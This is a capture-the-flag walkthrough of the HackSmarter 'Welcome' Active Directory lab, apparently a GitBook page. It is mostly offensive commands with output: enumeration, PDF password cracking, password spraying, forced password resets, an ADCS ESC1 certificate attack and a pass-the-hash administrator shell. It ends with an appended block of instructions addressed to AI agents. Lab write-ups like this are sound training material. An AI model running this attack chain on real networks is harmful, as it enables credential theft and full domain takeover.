# Welcome (Easy) - HackSmarter

### Objective / Scope You are a member of the Hack Smarter Red Team. During a phishing engagement, you were able to retrieve credentials for the client's Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client. **Starting Credentials** ``` e.hills:Il0vemyj0b2025! ``` ## Enumeration / Scanning ``` nmap -p- -vvv --min-rate 1000 10.1.37.211 53/tcp open domain syn-ack ttl 126 135/tcp open msrpc syn-ack ttl 126 139/tcp open netbios-ssn syn-ack ttl 126 445/tcp open microsoft-ds syn-ack ttl 126 593/tcp open http-rpc-epmap syn-ack ttl 126 636/tcp open ldapssl syn-ack ttl 126 3389/tcp open ms-wbt-server syn-ack ttl 126 ``` ``` nmap -p53,135,139,445,593,636,3389 -sC -sV 10.1.37.211 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name) |_ssl-date: 2026-04-19T06:51:46+00:00; -7h04m15s from scanner time. | ssl-cert: Subject: commonName=DC01.WELCOME.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.WELCOME.local | Not valid before: 2025-09-13T16:39:47 |_Not valid after: 2026-09-13T16:39:47 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2026-04-19T06:51:46+00:00; -7h04m15s from scanner time. | rdp-ntlm-info: | Target_Name: WELCOME | NetBIOS_Domain_Name: WELCOME | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: WELCOME.local | DNS_Computer_Name: DC01.WELCOME.local | DNS_Tree_Name: WELCOME.local | Product_Version: 10.0.20348 |_ System_Time: 2026-04-19T06:51:04+00:00 | ssl-cert: Subject: commonName=DC01.WELCOME.local | Not valid before: 2026-04-18T06:45:47 |_Not valid after: 2026-10-18T06:45:47 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows ``` * Generate host file add the domain into `/etc/host`

### Verify The Creds ``` nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' ```

### Enumerating the usernames ``` nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' --users-export usernames ```

### Enumerating Shares ``` nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' --shares ```

* Let's crawl though all this shares using spider\_plus in nxc ``` nxc smb 10.1.37.211 -u e.hills -p 'Il0vemyj0b2025!' -M spider_plus ```

``` cat /home/l1nuxkid/.nxc/modules/nxc_spider_plus/10.1.37.211.json | jq . ```

* There are 4pdfs in `Human Resources` share. let's download this files to our local kali machine and view analyze it ``` smbclient //10.1.37.211/'Human Resources' -U 'e.hills%Il0vemyj0b2025!' prompt off recuse on mget * ```

* Viewing one of the pdf file it prompted me for password so the pdf is password protected we require to crack the pass.

### Cracking pdf password using john ``` pdf2john Welcome\ Start\ Guide.pdf > pdf.hash ``` ``` john pdf.hash -w=/usr/share/wordlists/rockyou.txt ```

Now opening the pdf we can see we have new password

### Password Spray ``` nxc ldap 10.1.37.211 -u usernames -p 'Welcome2025!@' --continue-on-success ```

### Shell as a.harris ``` nxc winrm dc01 -u a.harris -p 'Welcome2025!@'; ```

`user.txt`

### Collecting bloodhound loot/data ``` *Evil-WinRM* PS C:\Users\a.harris\Desktop> upload ~/Tools/SharpHound.exe . ``` Firewall Blocking our script ``` nxc ldap 10.1.37.211 -u a.harris -p pass --bloodhound --collection all --dns-server 10.1.37.211 ```

Looking at the ACL we have genericAll over `I.PARK`

``` net rpc password "I.PARK" "l1nuxkid@123" -U "WELCOME.local"/"a.harris"%'Welcome2025!@' -S 10.1.37.211 ``` And I.PARK user have `ForceChangePassword` over `SVC_CA` , `SVC_WEB`

``` net rpc password "svc_ca" "l1nuxkid@123" -U "WELCOME.local"/"I.PARK"%'l1nuxkid@123' -S 10.1.37.211 ``` Changed the password of svc\_ca now `ca` stands for certificate authority let's run certipy also in bloodhound svc\_ca is member of certificate publishers group ### Certificate Attacks ADCS ``` certipy-ad find -u svc_ca -p 'l1nuxkid@123' -target welcome.local -text -stdout -vulnerable Certificate Authorities 0 CA Name : WELCOME-CA DNS Name : DC01.WELCOME.local Certificate Subject : CN=WELCOME-CA, DC=WELCOME, DC=local Certificate Serial Number : 6E7A025A45F4E6A14E1F08B77737AFD9 Certificate Validity Start : 2025-09-13 16:39:33+00:00 Certificate Validity End : 2030-09-13 16:49:33+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Permissions Owner : WELCOME.LOCAL\Administrators Access Rights ManageCa : WELCOME.LOCAL\Administrators WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins ManageCertificates : WELCOME.LOCAL\Administrators WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins Enroll : WELCOME.LOCAL\Authenticated Users Certificate Templates 0 Template Name : Welcome-Template Display Name : Welcome-Template Certificate Authorities : WELCOME-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : PublishToDs Extended Key Usage : Server Authentication Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Template Created : 2025-09-14T03:12:52+00:00 Template Last Modified : 2025-10-30T02:19:35+00:00 Permissions Enrollment Permissions Enrollment Rights : WELCOME.LOCAL\svc ca WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins Object Control Permissions Owner : WELCOME.LOCAL\Administrator Full Control Principals : WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins Write Owner Principals : WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins Write Dacl Principals : WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins Write Property Enroll : WELCOME.LOCAL\Domain Admins WELCOME.LOCAL\Enterprise Admins [+] User Enrollable Principals : WELCOME.LOCAL\svc ca ```

### ESC 1 To perform ESC 1 certificate attack we require following things * WE Need Domain SID * FQDN * Certificate Authority (CA) name * Template name * upn : administrator ``` nxc ldap welcome.local -u svc_ca -p l1nuxkid@123 --get-sid ```

``` certipy-ad req -u 'svc_ca' -p 'l1nuxkid@123' -dc-ip '10.1.37.211' -target 'dc01.welcome.local' -ca 'WELCOME-CA' -template 'Welcome-Template' -upn 'administrator@welcome.local' -sid 'S-1-5-21-141921413-1529318470-1830575104-500' ```

Now its time to authenticate with given certificate as an administrator by launching simple command as ``` certipy-ad auth -pfx administrator.pdf -dc-ip 10.1.37.211 ```

### Shell as administrator using pth ``` evil-winrm -i welcome.local -u 'administrator' -H 0cf1b799460a39c852068b7c0574677a ```

``` type ../Desktop/* ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/welcome-easy-hacksmarter.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.